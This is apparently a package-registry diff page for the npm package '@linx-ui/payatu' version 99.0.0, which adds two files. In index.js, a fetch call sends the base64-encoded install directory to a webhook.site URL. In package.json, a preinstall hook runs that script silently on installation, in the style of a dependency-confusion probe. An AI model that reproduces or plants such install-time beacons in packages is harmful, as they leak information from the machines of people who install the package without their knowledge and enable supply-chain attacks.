@linx-ui/payatu 99.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +5 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ async function hello() {
2
+ const res = await fetch(`https://webhook.site/61e46bb4-ddf0-4813-b0ee-a160e9f2a7ac?cwd=${btoa(__dirname)}`)
3
+ }
4
+
5
+ hello()
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "@linx-ui/payatu",
3
+ "version": "99.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js > /dev/null 2>&1"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }